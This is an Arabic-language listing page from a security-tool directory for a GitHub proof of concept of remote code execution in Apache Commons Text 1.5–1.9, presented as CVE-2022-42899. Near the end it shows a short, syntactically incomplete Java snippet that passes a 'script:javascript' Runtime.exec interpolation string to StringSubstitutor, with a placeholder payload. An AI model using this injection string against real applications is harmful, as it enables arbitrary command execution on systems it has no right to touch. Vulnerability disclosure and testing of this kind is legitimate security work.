Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-42899 — استغلال إثبات المفهوم لـ CVE-2022-42899، يوضح تنفيذ كود عن بُعد في Apache Commons Text 1.5-1.9 عبر استيفاء StringSubstitutor بحمولات script:javascript. | Kitploit
أدوات/GitHubGitHub/iamsanjay/cve-2022-42899
توليد الحمولةتحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويب
GitHubiamsanjay/cve-2022-42899

CVE-2022-42899

استغلال إثبات المفهوم لـ CVE-2022-42899، يوضح تنفيذ كود عن بُعد في Apache Commons Text 1.5-1.9 عبر استيفاء StringSubstitutor بحمولات script:javascript.

عرض المستودع
354منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-42899

يحتوي Apache Common Text بدءًا من الإصدار 1.5 إلى الإصدار 1.9 على ثغرة تنفيذ التعليمات البرمجية عن بُعد CVE-2022-42899.

final StringSubstitutor interpolator = StringSubstitutor.createInterpolator();
interpolator.replace("${script:javascript:java.lang.Runtime.getRuntime().exec('<payload to execute RCE>"); // Here you will pass payload which you want to execute such as 'mkdir /tmp/cve-2022-42899'
تنزيل الأداة